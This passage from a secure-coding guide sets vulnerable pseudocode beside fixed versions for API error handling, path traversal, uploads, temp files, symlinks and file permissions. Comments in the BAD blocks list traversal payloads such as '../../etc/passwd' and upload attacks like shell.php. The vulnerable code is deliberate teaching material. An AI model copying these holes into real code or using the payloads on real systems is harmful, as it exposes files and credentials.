======================================== + +// Exposes database structure +@route("/api/users/{id}") +FUNCTION get_user_bad_errors(request, id): + TRY: + user = database.get_user(id) + RETURN response(200, user) + CATCH DatabaseError as e: + // VULNERABLE: Exposes 
table names, query structure + RETURN response(500, { + error: "Database error", + query: "SELECT * FROM users WHERE id = " + id, + message: e.message, // "Column 'password_hash' cannot be null" + stack_trace: e.stack_trace + }) + END TRY +END FUNCTION + +// Reveals filesystem paths +@route("/api/files/{file_id}") +FUNCTION get_file_bad(request, file_id): + TRY: + content = read_file("/var/app/uploads/" + file_id) + RETURN response(200, content) + CATCH FileNotFoundError as e: + // VULNERABLE: Exposes server filesystem structure + RETURN response(404, { + error: "File not found: /var/app/uploads/" + file_id, + available_files: list_directory("/var/app/uploads/") + }) + END TRY +END FUNCTION + +// Authentication timing oracle +@route("/api/auth/login") +FUNCTION login_timing_oracle(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL: + // Returns immediately - attacker knows email doesn't exist + RETURN response(401, {error: "User not found"}) + END IF + + IF NOT verify_password(request.body.password, user.password_hash): + // Takes longer due to password verification + RETURN response(401, {error: "Invalid password"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Inconsistent error format breaks security tools +@route("/api/orders") +FUNCTION create_order_inconsistent(request): + IF NOT valid_items(request.body.items): + RETURN response(400, "Invalid items") // String + END IF + + IF NOT has_stock(request.body.items): + RETURN response(400, {msg: "Out of stock"}) // Different key + END IF + + IF payment_failed: + RETURN {status: "error", reason: "Payment failed"} // No status code + END IF +END FUNCTION + +// ======================================== +// GOOD: Secure, consistent error handling +// ======================================== + +// Standardized error response class +CLASS APIError: + status: Integer + code: String // Machine-readable error code + message: String // User-friendly message + 
request_id: String // For support/debugging + + FUNCTION to_response(): + RETURN response(this.status, { + error: { + code: this.code, + message: this.message, + request_id: this.request_id + } + }) + END FUNCTION +END CLASS + +// Error codes mapping (documented in API docs) +ERROR_CODES = { + "AUTH_REQUIRED": {status: 401, message: "Authentication required"}, + "AUTH_INVALID": {status: 401, message: "Invalid credentials"}, + "FORBIDDEN": {status: 403, message: "Access denied"}, + "NOT_FOUND": {status: 404, message: "Resource not found"}, + "VALIDATION_ERROR": {status: 400, message: "Invalid request data"}, + "RATE_LIMITED": {status: 429, message: "Too many requests"}, + "INTERNAL_ERROR": {status: 500, message: "An unexpected error occurred"} +} + +// Global error handler +FUNCTION global_error_handler(error, request): + request_id = generate_request_id() + + // Log full error details internally + log.error("Request failed", { + request_id: request_id, + path: request.path, + method: request.method, + user_id: request.user.id IF request.user ELSE NULL, + error_type: error.type, + error_message: error.message, + stack_trace: error.stack_trace, + request_body: redact_sensitive(request.body) + }) + + // Return sanitized error to client + IF error IS APIError: + error.request_id = request_id + RETURN error.to_response() + ELSE IF error IS ValidationError: + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message=error.user_message, // Safe message + request_id=request_id + ).to_response() + ELSE: + // Generic error - never expose internal details + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="An unexpected error occurred. 
Reference: " + request_id, + request_id=request_id + ).to_response() + END IF +END FUNCTION + +// Secure authentication with constant-time comparison +@route("/api/auth/login") +FUNCTION login_secure_errors(request): + email = request.body.email + password = request.body.password + + user = database.find_by_email(email) + + // Always perform password check to prevent timing oracle + IF user IS NOT NULL: + password_valid = constant_time_compare( + hash_password(password, user.salt), + user.password_hash + ) + ELSE: + // Fake password check to maintain consistent timing + constant_time_compare( + hash_password(password, generate_fake_salt()), + DUMMY_HASH + ) + password_valid = FALSE + END IF + + IF NOT password_valid: + // Same error message whether user exists or not + log.security("Failed login attempt", { + email_hash: sha256(email), // Don't log raw email + ip: request.client_ip + }) + RETURN APIError( + status=401, + code="AUTH_INVALID", + message="Invalid email or password" + ).to_response() + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// File operations without path disclosure +@route("/api/files/{file_id}") +FUNCTION get_file_secure(request, file_id): + // Validate file_id format (UUID only) + IF NOT is_valid_uuid(file_id): + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message="Invalid file ID format" + ).to_response() + END IF + + // Look up file in database (not filesystem path) + file_record = database.get_file(file_id) + + IF file_record IS NULL: + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + // Check ownership + IF file_record.owner_id != request.user.id: + // Same error as not found - don't reveal existence + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + TRY: + content = storage.read(file_record.storage_key) + RETURN response(200, content, headers={ + "Content-Type": 
file_record.mime_type + }) + CATCH StorageError as e: + log.error("File read failed", { + file_id: file_id, + storage_key: file_record.storage_key, + error: e.message + }) + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="Unable to retrieve file" + ).to_response() + END TRY +END FUNCTION + +// Validation errors without revealing schema +FUNCTION validate_request(schema, data): + errors = [] + + FOR field, rules IN schema: + IF field NOT IN data AND rules.required: + errors.append({ + field: field, + message: "This field is required" + }) + ELSE IF field IN data: + value = data[field] + + // Type validation + IF NOT check_type(value, rules.type): + errors.append({ + field: field, + message: "Invalid value" // Don't say "expected integer" + }) + // Length validation + ELSE IF rules.max_length AND len(value) > rules.max_length: + errors.append({ + field: field, + message: "Value too long" + }) + END IF + END IF + END FOR + + IF errors.length > 0: + THROW ValidationError(errors) + END IF +END FUNCTION +``` + +--- + +## 10. File Handling + +**CWE References:** CWE-22 (Path Traversal), CWE-434 (Unrestricted Upload), CWE-377 (Insecure Temp File), CWE-59 (Symlink Following), CWE-732 (Incorrect Permission Assignment) +**Severity:** High to Critical | **Related:** [[File-Handling]] + +> **Risk:** File handling vulnerabilities enable attackers to read/write arbitrary files, execute malicious uploads, or escalate privileges through symlink attacks. AI-generated code frequently uses unsafe path concatenation and skips file validation entirely. 
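The path-concatenation risk named above can be made concrete with a minimal Python sketch. It is an illustration under stated assumptions, not part of the skill's reference patterns: `resolve_inside` is a hypothetical helper name, and the sketch assumes a POSIX-style filesystem where `Path.resolve()` follows symlinks.

```python
from pathlib import Path


def resolve_inside(base_dir: str, requested_name: str) -> Path:
    """Return the resolved path for requested_name inside base_dir.

    Hypothetical helper for illustration: raises ValueError when the name
    is unusable or the resolved path would leave base_dir.
    """
    base = Path(base_dir).resolve()

    # Keep only the final path component, so "../" segments and
    # absolute paths supplied by the caller are discarded.
    name = Path(requested_name).name
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")

    # resolve() follows symlinks, so a link that points outside
    # base_dir resolves to a path that fails the containment check.
    candidate = (base / name).resolve()
    if base not in candidate.parents:
        raise ValueError("path escapes base directory")

    return candidate
```

A request for `../../etc/passwd` is reduced to `passwd` under the base directory, while a symlink inside the directory that targets a location outside it is rejected. The check does not close the race between validation and use; that still needs handle-based checks on the opened file.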
+ +### 10.1 Path Traversal Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Direct path concatenation allows traversal +// ======================================== +FUNCTION download_file_vulnerable(user_requested_filename): + // VULNERABLE: Attacker can request "../../etc/passwd" + file_path = "/var/app/uploads/" + user_requested_filename + + content = read_file(file_path) + RETURN content +END FUNCTION + +@route("/api/files/download") +FUNCTION handle_download_bad(request): + filename = request.query.filename + // No validation - attacker controls path + RETURN download_file_vulnerable(filename) +END FUNCTION + +// Attack examples: +// ?filename=../../etc/passwd -> reads /etc/passwd +// ?filename=....//....//etc/passwd -> bypasses simple ../ filters +// ?filename=..%2F..%2Fetc/passwd -> URL encoded traversal +// ?filename=/etc/passwd -> absolute path injection + +// ======================================== +// GOOD: Secure path handling with validation +// ======================================== +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +FUNCTION download_file_secure(user_requested_filename): + // Step 1: Reject obviously malicious input + IF user_requested_filename IS NULL OR user_requested_filename == "": + THROW ValidationError("Filename required") + END IF + + // Step 2: Get only the base filename, reject path components + safe_filename = get_basename(user_requested_filename) + + // Step 3: Reject filenames that are empty after basename extraction + IF safe_filename == "" OR safe_filename == "." 
OR safe_filename == "..": + THROW ValidationError("Invalid filename") + END IF + + // Step 4: Build the full path + full_path = join_path(UPLOAD_DIR, safe_filename) + + // Step 5: Resolve to absolute path and verify it's within allowed directory + resolved_path = resolve_absolute_path(full_path) + + IF NOT resolved_path.starts_with(UPLOAD_DIR + "/"): + log.security("Path traversal attempt blocked", { + requested: user_requested_filename, + resolved: resolved_path + }) + THROW SecurityError("Access denied") + END IF + + // Step 6: Verify file exists and is a regular file (not directory/symlink) + IF NOT file_exists(resolved_path) OR NOT is_regular_file(resolved_path): + THROW NotFoundError("File not found") + END IF + + RETURN read_file(resolved_path) +END FUNCTION + +// Alternative: Use database lookups instead of filesystem paths +FUNCTION download_file_by_id(file_id): + // Validate file_id format (UUID) + IF NOT is_valid_uuid(file_id): + THROW ValidationError("Invalid file ID") + END IF + + // Look up file metadata in database + file_record = database.query( + "SELECT storage_path, original_name, owner_id FROM files WHERE id = ?", + [file_id] + ) + + IF file_record IS NULL: + THROW NotFoundError("File not found") + END IF + + // Verify ownership + IF file_record.owner_id != current_user.id: + THROW ForbiddenError("Access denied") + END IF + + // Storage path is server-controlled, not user input + RETURN read_file(file_record.storage_path) +END FUNCTION + +// Path validation helper +FUNCTION is_safe_path(base_dir, requested_path): + // Resolve both paths to absolute canonical form + base_resolved = resolve_canonical_path(base_dir) + full_resolved = resolve_canonical_path(join_path(base_dir, requested_path)) + + // Ensure resolved path is within base directory + RETURN full_resolved.starts_with(base_resolved + PATH_SEPARATOR) +END FUNCTION +``` + +### 10.2 Unrestricted File Uploads + +``` +// PSEUDOCODE - Implement in your target language + +// 
======================================== +// BAD: No validation on uploaded files +// ======================================== +@route("/api/upload") +FUNCTION upload_file_vulnerable(request): + uploaded_file = request.files.get("file") + + // VULNERABLE: Accepts any file type + filename = uploaded_file.filename + + // VULNERABLE: Uses user-provided filename directly + save_path = "/var/app/uploads/" + filename + + // VULNERABLE: No size limits + uploaded_file.save(save_path) + + // VULNERABLE: May be served with executable MIME type + RETURN {url: "/files/" + filename} +END FUNCTION + +// Attack scenarios: +// - Upload shell.php -> execute PHP code +// - Upload malicious.html -> stored XSS +// - Upload ../../../etc/cron.d/malicious -> write to system dirs +// - Upload huge file -> disk exhaustion DoS +// - Upload polyglot (valid image + embedded JS) -> bypass checks + +// ======================================== +// GOOD: Comprehensive upload validation +// ======================================== +CONSTANT ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"} +CONSTANT ALLOWED_MIME_TYPES = { + "image/jpeg", "image/png", "image/gif", + "application/pdf", + "application/msword", + "application/vnd.openxmlformats-officedocument.wordprocessingml.document" +} +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10 MB +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +@route("/api/upload") +FUNCTION upload_file_secure(request): + uploaded_file = request.files.get("file") + + IF uploaded_file IS NULL: + RETURN error_response(400, "No file provided") + END IF + + // Step 1: Check file size BEFORE reading into memory + content_length = request.headers.get("Content-Length") + IF content_length IS NOT NULL AND int(content_length) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 2: Validate original filename extension + original_filename = uploaded_file.filename + extension = get_extension(original_filename).lower() + + IF extension 
NOT IN ALLOWED_EXTENSIONS: + log.warning("Rejected upload with extension", {extension: extension}) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 3: Read file with size limit + file_content = uploaded_file.read(MAX_FILE_SIZE + 1) + + IF len(file_content) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 4: Validate MIME type from file content (magic bytes) + detected_mime = detect_mime_type(file_content) + + IF detected_mime NOT IN ALLOWED_MIME_TYPES: + log.warning("MIME type mismatch", { + claimed: uploaded_file.content_type, + detected: detected_mime + }) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 5: For images, verify they parse correctly (anti-polyglot) + IF detected_mime.starts_with("image/"): + TRY: + image = parse_image(file_content) + // Re-encode to strip any embedded data + file_content = encode_image(image, format=extension) + CATCH ImageParseError: + RETURN error_response(400, "Invalid image file") + END TRY + END IF + + // Step 6: Generate random filename (never use user input) + random_name = generate_uuid() + "." 
+ extension + save_path = join_path(UPLOAD_DIR, random_name) + + // Step 7: Save with restrictive permissions (no execute bit, not world-readable) + write_file(save_path, file_content, permissions=0o640) + + // Step 8: Store metadata in database + file_id = database.insert("files", { + id: generate_uuid(), + storage_name: random_name, + original_name: sanitize_filename(original_filename), + mime_type: detected_mime, + size: len(file_content), + owner_id: current_user.id, + uploaded_at: current_timestamp() + }) + + log.info("File uploaded", {file_id: file_id, size: len(file_content)}) + + RETURN { + file_id: file_id, + // Serve through controlled endpoint, not direct file access + url: "/api/files/" + file_id + } +END FUNCTION + +// Serve uploaded files safely +@route("/api/files/{file_id}") +FUNCTION serve_file_secure(request, file_id): + file_record = database.get_file(file_id) + + IF file_record IS NULL OR file_record.owner_id != current_user.id: + RETURN error_response(404, "File not found") + END IF + + file_path = join_path(UPLOAD_DIR, file_record.storage_name) + content = read_file(file_path) + + RETURN response(200, content, headers={ + // Force download instead of inline rendering in the browser + "Content-Disposition": "attachment; filename=\"" + + sanitize_header(file_record.original_name) + "\"", + // Prevent MIME sniffing + "X-Content-Type-Options": "nosniff", + // Strict content type + "Content-Type": file_record.mime_type + }) +END FUNCTION +``` + +### 10.3 Missing File Type Validation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Extension-only or no validation +// ======================================== +FUNCTION validate_image_bad(filename, file_content): + // VULNERABLE: Only checks extension, easily spoofed + extension = get_extension(filename).lower() + + IF extension IN ["jpg", "jpeg", "png", "gif"]: + RETURN TRUE // Attacker renames malware.exe to malware.jpg + END IF + + RETURN FALSE +END FUNCTION + +FUNCTION 
validate_mime_header_bad(file_content): + // VULNERABLE: Only checks claimed MIME type header + mime = request.headers.get("Content-Type") + + IF mime.starts_with("image/"): + RETURN TRUE // Attacker sets Content-Type: image/png for shell.php + END IF + + RETURN FALSE +END FUNCTION + +// ======================================== +// GOOD: Multi-layer file type validation +// ======================================== + +// Magic bytes signatures for common file types +MAGIC_SIGNATURES = { + "jpg": [0xFF, 0xD8, 0xFF], + "png": [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A], + "gif": [0x47, 0x49, 0x46, 0x38], // GIF8 + "pdf": [0x25, 0x50, 0x44, 0x46], // %PDF + "zip": [0x50, 0x4B, 0x03, 0x04], + "docx": [0x50, 0x4B, 0x03, 0x04], // DOCX is ZIP-based +} + +FUNCTION validate_file_type(filename, file_content, allowed_types): + // Layer 1: Extension validation + extension = get_extension(filename).lower() + + IF extension NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Extension not allowed"} + END IF + + // Layer 2: Magic bytes validation + detected_type = detect_type_by_magic(file_content) + + IF detected_type IS NULL: + RETURN {valid: FALSE, reason: "Unknown file type"} + END IF + + IF detected_type NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Content type not allowed"} + END IF + + // Layer 3: Extension matches content + IF NOT extension_matches_content(extension, detected_type): + RETURN {valid: FALSE, reason: "Extension does not match content"} + END IF + + // Layer 4: For specific types, deep validation + IF detected_type IN ["jpg", "jpeg", "png", "gif"]: + IF NOT validate_image_structure(file_content): + RETURN {valid: FALSE, reason: "Invalid image structure"} + END IF + ELSE IF detected_type == "pdf": + IF NOT validate_pdf_safe(file_content): + RETURN {valid: FALSE, reason: "PDF contains unsafe content"} + END IF + ELSE IF detected_type IN ["docx", "xlsx"]: + IF NOT validate_office_safe(file_content): + RETURN {valid: FALSE, reason: "Document 
contains macros"} + END IF + END IF + + RETURN {valid: TRUE, detected_type: detected_type} +END FUNCTION + +FUNCTION detect_type_by_magic(file_content): + IF len(file_content) < 8: + RETURN NULL + END IF + + header = file_content[0:8] + + FOR type_name, signature IN MAGIC_SIGNATURES: + IF header.starts_with(bytes(signature)): + RETURN type_name + END IF + END FOR + + RETURN NULL +END FUNCTION + +FUNCTION validate_image_structure(file_content): + TRY: + // Use secure image library to parse + image = image_library.decode(file_content) + + // Check for reasonable dimensions (anti-DoS) + IF image.width > 10000 OR image.height > 10000: + RETURN FALSE + END IF + + // Check pixel count (decompression bomb protection) + IF image.width * image.height > 100000000: // 100 megapixels + RETURN FALSE + END IF + + RETURN TRUE + + CATCH ImageDecodeError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_pdf_safe(file_content): + TRY: + pdf = pdf_library.parse(file_content) + + // Check for JavaScript (often used in attacks) + IF pdf.contains_javascript(): + RETURN FALSE + END IF + + // Check for embedded files + IF pdf.has_embedded_files(): + RETURN FALSE + END IF + + // Check for form actions pointing to URLs + IF pdf.has_external_actions(): + RETURN FALSE + END IF + + RETURN TRUE + + CATCH PDFParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_office_safe(file_content): + TRY: + // Office files are ZIP archives + archive = zip_library.open(file_content) + + // Check for macro-enabled formats + FOR entry IN archive.entries(): + IF entry.name.contains("vbaProject") OR entry.name.ends_with(".bin"): + RETURN FALSE // Contains macros + END IF + END FOR + + RETURN TRUE + + CATCH ZipError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 10.4 Insecure Temporary File Handling + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or insecure temp files +// 
======================================== + +// Mistake 1: Predictable filename +FUNCTION create_temp_bad_predictable(data): + // VULNERABLE: Attacker can predict and pre-create file + temp_path = "/tmp/myapp_" + current_user.id + ".tmp" + + // Race condition: attacker creates symlink before this + write_file(temp_path, data) + + RETURN temp_path +END FUNCTION + +// Mistake 2: World-readable permissions +FUNCTION create_temp_bad_permissions(data): + temp_path = "/tmp/myapp_" + random_string(8) + ".tmp" + + // VULNERABLE: Default permissions may be world-readable (0644) + write_file(temp_path, data) // Other users can read + + RETURN temp_path +END FUNCTION + +// Mistake 3: Not cleaning up +FUNCTION process_upload_bad_cleanup(uploaded_data): + temp_path = "/tmp/upload_" + generate_uuid() + write_file(temp_path, uploaded_data) + + TRY: + result = process_file(temp_path) + // VULNERABLE: Temp file remains on disk if exception occurs elsewhere + RETURN result + CATCH Error as e: + // Temp file leaked! 
+ THROW e + END TRY +END FUNCTION + +// Mistake 4: Using system temp without isolation +FUNCTION create_temp_bad_shared(data): + // VULNERABLE: Shared /tmp can be accessed by other users/processes + temp_path = temp_directory() + "/" + random_string(8) + write_file(temp_path, data) + RETURN temp_path +END FUNCTION + +// ======================================== +// GOOD: Secure temporary file handling +// ======================================== + +// Use language's secure temp file creation +FUNCTION create_temp_secure(data, suffix=".tmp"): + // mkstemp equivalent: creates file with random name and 0600 permissions + temp_file = create_secure_temp_file( + prefix="myapp_", + suffix=suffix, + dir="/var/app/tmp" // App-specific temp directory + ) + + // Write data to already-open file handle (no race condition) + temp_file.write(data) + temp_file.flush() + + RETURN temp_file +END FUNCTION + +// Process with guaranteed cleanup +FUNCTION process_upload_secure(uploaded_data): + temp_file = NULL + + TRY: + // Create secure temp file + temp_file = create_secure_temp_file( + prefix="upload_", + suffix=get_safe_extension(uploaded_data.filename), + dir=APPLICATION_TEMP_DIR + ) + + // Write with explicit permissions + temp_file.write(uploaded_data.content) + temp_file.flush() + + // Process the file + result = process_file(temp_file.path) + + RETURN result + + FINALLY: + // Always clean up, even on exception + IF temp_file IS NOT NULL: + TRY: + temp_file.close() + delete_file(temp_file.path) + CATCH: + log.warning("Failed to clean up temp file", {path: temp_file.path}) + END TRY + END IF + END TRY +END FUNCTION + +// Context manager pattern for automatic cleanup +FUNCTION with_temp_file(data, callback): + temp_file = create_secure_temp_file(prefix="ctx_") + + TRY: + temp_file.write(data) + temp_file.flush() + + RETURN callback(temp_file.path) + + FINALLY: + temp_file.close() + secure_delete(temp_file.path) // Overwrite before delete for sensitive data + END TRY +END FUNCTION + 
+// Usage: +result = with_temp_file(sensitive_data, FUNCTION(path): + RETURN external_processor.process(path) +END FUNCTION) + +// Secure temp directory per-request +FUNCTION create_temp_directory_secure(): + // Create directory with random name and 0700 permissions + temp_dir = create_secure_temp_directory( + prefix="session_", + dir=APPLICATION_TEMP_DIR + ) + + // Set restrictive permissions + set_permissions(temp_dir, 0o700) + + RETURN temp_dir +END FUNCTION + +// Application startup: ensure temp directory security +FUNCTION initialize_temp_directory(): + temp_dir = APPLICATION_TEMP_DIR + + // Create if doesn't exist + IF NOT directory_exists(temp_dir): + create_directory(temp_dir, permissions=0o700) + END IF + + // Verify permissions + current_perms = get_permissions(temp_dir) + IF current_perms != 0o700: + set_permissions(temp_dir, 0o700) + END IF + + // Verify ownership + IF get_owner(temp_dir) != get_current_user(): + THROW SecurityError("Temp directory has incorrect ownership") + END IF + + // Clean up old temp files on startup + cleanup_old_temp_files(temp_dir, max_age_hours=24) +END FUNCTION + +// Secure delete for sensitive data +FUNCTION secure_delete(file_path): + IF file_exists(file_path): + // Overwrite with random data before deletion + file_size = get_file_size(file_path) + random_data = crypto.random_bytes(file_size) + write_file(file_path, random_data) + sync_to_disk(file_path) + + // Now delete + delete_file(file_path) + END IF +END FUNCTION +``` + +### 10.5 Symlink Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Following symlinks without validation +// ======================================== +FUNCTION read_user_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: If filename is symlink to /etc/passwd, reads it + IF file_exists(file_path): + RETURN read_file(file_path) + END IF + + 
RETURN NULL +END FUNCTION + +FUNCTION delete_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: Attacker creates symlink to critical file + // Symlink: /var/app/users/123/data -> /etc/passwd + // delete_file follows the symlink and deletes /etc/passwd + delete_file(file_path) +END FUNCTION + +// TOCTOU (Time of Check to Time of Use) vulnerability +FUNCTION process_file_toctou(file_path): + // Check if file is safe + IF is_symlink(file_path): + THROW SecurityError("Symlinks not allowed") + END IF + + // VULNERABLE: Race condition between check and use + // Attacker replaces regular file with symlink here + + // Process the file (now following attacker's symlink) + content = read_file(file_path) + RETURN process_content(content) +END FUNCTION + +// ======================================== +// GOOD: Safe symlink handling +// ======================================== + +// Option 1: Reject symlinks entirely +FUNCTION read_user_file_no_symlinks(user_id, filename): + user_dir = "/var/app/users/" + user_id + + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(user_dir, filename) + + // Use lstat to check WITHOUT following symlinks + file_stat = lstat(file_path) // NOT stat() + + IF file_stat IS NULL: + THROW NotFoundError("File not found") + END IF + + // Reject if symlink + IF file_stat.is_symlink: + log.security("Symlink access blocked", {path: file_path}) + THROW SecurityError("Access denied") + END IF + + // Reject if not regular file + IF NOT file_stat.is_regular_file: + THROW ValidationError("Not a regular file") + END IF + + // Use O_NOFOLLOW flag when opening + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + content = file_handle.read() + file_handle.close() + + RETURN content +END FUNCTION + +// Option 2: Resolve and validate path before access +FUNCTION 
read_file_resolved(base_dir, relative_path): + // Get the real path resolving all symlinks + requested_path = join_path(base_dir, relative_path) + real_path = realpath(requested_path) + + // Verify real path is within allowed base directory + real_base = realpath(base_dir) + + IF NOT real_path.starts_with(real_base + "/"): + log.security("Path escape via symlink", { + requested: requested_path, + resolved: real_path, + base: real_base + }) + THROW SecurityError("Access denied") + END IF + + RETURN read_file(real_path) +END FUNCTION + +// Option 3: Atomic operations to prevent TOCTOU +FUNCTION process_file_atomic(file_path): + // Open with O_NOFOLLOW - fails if symlink + TRY: + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + CATCH SymlinkError: + THROW SecurityError("Symlinks not allowed") + END TRY + + // fstat the open handle, not the path (prevents TOCTOU) + file_stat = fstat(file_handle) + + // Verify it's still a regular file + IF NOT file_stat.is_regular_file: + file_handle.close() + THROW ValidationError("Not a regular file") + END IF + + // Read from the verified handle + content = file_handle.read() + file_handle.close() + + RETURN process_content(content) +END FUNCTION + +// Safe file writing with symlink protection +FUNCTION write_file_safe(directory, filename, content): + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(directory, filename) + + // Check if path already exists + existing_stat = lstat(file_path) + + IF existing_stat IS NOT NULL: + IF existing_stat.is_symlink: + THROW SecurityError("Cannot overwrite symlink") + END IF + END IF + + // Open with O_CREAT | O_EXCL to fail if exists (then retry with O_TRUNC) + // Or use O_NOFOLLOW if supported for writing + TRY: + // Write to temp file first, then atomic rename + temp_path = join_path(directory, "." 
+ generate_uuid() + ".tmp") + + file_handle = open_file(temp_path, + flags=O_WRONLY | O_CREAT | O_EXCL, + permissions=0o644 + ) + file_handle.write(content) + file_handle.flush() + file_handle.close() + + // Atomic rename (on same filesystem) + rename_file(temp_path, file_path) + + CATCH FileExistsError: + // Handle race condition + THROW ConcurrencyError("File creation conflict") + END TRY +END FUNCTION + +// Directory traversal with symlink safety +FUNCTION list_directory_safe(dir_path): + real_dir = realpath(dir_path) + entries = [] + + FOR entry IN list_directory(real_dir): + entry_path = join_path(real_dir, entry.name) + entry_stat = lstat(entry_path) // Don't follow symlinks + + entry_info = { + name: entry.name, + is_file: entry_stat.is_regular_file, + is_dir: entry_stat.is_directory, + is_symlink: entry_stat.is_symlink, + size: entry_stat.size IF entry_stat.is_regular_file ELSE 0 + } + + // Optionally resolve symlink target for display + IF entry_stat.is_symlink: + entry_info.symlink_target = readlink(entry_path) + // Check if symlink points outside directory + real_target = realpath(entry_path) + entry_info.safe = real_target.starts_with(real_dir + "/") + END IF + + entries.append(entry_info) + END FOR + + RETURN entries +END FUNCTION +``` + +### 10.6 Unsafe File Permissions + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Overly permissive file permissions +// ======================================== + +// Mistake 1: World-readable sensitive files +FUNCTION save_config_bad(config_data): + // VULNERABLE: Default umask may create 0644 (world-readable) + write_file("/etc/myapp/config.json", json_encode(config_data)) + // Config contains database passwords, API keys, etc. 
+END FUNCTION + +// Mistake 2: World-writable files +FUNCTION create_log_bad(): + log_path = "/var/log/myapp/app.log" + + // VULNERABLE: 0666 allows any user to modify logs + write_file(log_path, "", permissions=0o666) +END FUNCTION + +// Mistake 3: Executable when shouldn't be +FUNCTION save_upload_bad(content, filename): + path = "/var/app/uploads/" + filename + + // VULNERABLE: 0755 makes file executable + write_file(path, content, permissions=0o755) + // Attacker uploads shell script and executes it +END FUNCTION + +// Mistake 4: Directory permissions too open +FUNCTION create_user_dir_bad(user_id): + dir_path = "/var/app/users/" + user_id + + // VULNERABLE: 0777 allows anyone to read/write/traverse + create_directory(dir_path, permissions=0o777) +END FUNCTION + +// Mistake 5: Not checking permissions on read +FUNCTION load_config_bad(): + config_path = "/etc/myapp/secrets.json" + + // VULNERABLE: Loads config without verifying it hasn't been tampered + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// ======================================== +// GOOD: Secure file permissions +// ======================================== + +// Permission constants +CONSTANT PERM_OWNER_ONLY = 0o600 // -rw------- +CONSTANT PERM_OWNER_READ_ONLY = 0o400 // -r-------- +CONSTANT PERM_STANDARD_FILE = 0o644 // -rw-r--r-- +CONSTANT PERM_PRIVATE_DIR = 0o700 // drwx------ +CONSTANT PERM_STANDARD_DIR = 0o755 // drwxr-xr-x + +FUNCTION save_sensitive_config(config_data): + config_path = "/etc/myapp/secrets.json" + + // Set restrictive umask for this operation + old_umask = set_umask(0o077) + + TRY: + // Write to temp file first + temp_path = config_path + ".tmp" + write_file(temp_path, json_encode(config_data)) + + // Explicitly set permissions (don't rely on umask) + set_permissions(temp_path, PERM_OWNER_ONLY) + + // Set ownership to service account + set_owner(temp_path, "myapp", "myapp") + + // Atomic rename + rename_file(temp_path, config_path) + + FINALLY: + // Restore umask 
+ set_umask(old_umask) + END TRY +END FUNCTION + +FUNCTION create_log_secure(): + log_dir = "/var/log/myapp" + log_path = log_dir + "/app.log" + + // Ensure directory exists with correct permissions + IF NOT directory_exists(log_dir): + create_directory(log_dir, permissions=PERM_STANDARD_DIR) + set_owner(log_dir, "myapp", "myapp") + END IF + + // Create log file with appropriate permissions + // 0640 = owner read/write, group read, others none + IF NOT file_exists(log_path): + write_file(log_path, "", permissions=0o640) + set_owner(log_path, "myapp", "adm") // adm group can read logs + END IF +END FUNCTION + +FUNCTION save_upload_secure(content, filename, user_id): + uploads_dir = "/var/app/uploads" + user_dir = join_path(uploads_dir, user_id) + + // Ensure user directory exists + IF NOT directory_exists(user_dir): + create_directory(user_dir, permissions=PERM_PRIVATE_DIR) + END IF + + // Generate safe filename + safe_name = generate_uuid() + get_safe_extension(filename) + file_path = join_path(user_dir, safe_name) + + // Save with NO execute permission, owner read/write only + write_file(file_path, content, permissions=PERM_OWNER_ONLY) + + RETURN file_path +END FUNCTION + +FUNCTION load_config_secure(config_path): + // Verify file exists + IF NOT file_exists(config_path): + THROW ConfigError("Config file not found") + END IF + + // Check permissions before loading + file_stat = stat(config_path) + + // Reject if world-readable or world-writable + IF file_stat.mode & 0o004: // World readable + THROW SecurityError("Config file is world-readable") + END IF + + IF file_stat.mode & 0o002: // World writable + THROW SecurityError("Config file is world-writable") + END IF + + // Verify ownership + expected_owner = get_service_user() + IF file_stat.owner != expected_owner: + THROW SecurityError("Config file has incorrect ownership") + END IF + + // Safe to load + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// Verify and fix permissions on startup +FUNCTION 
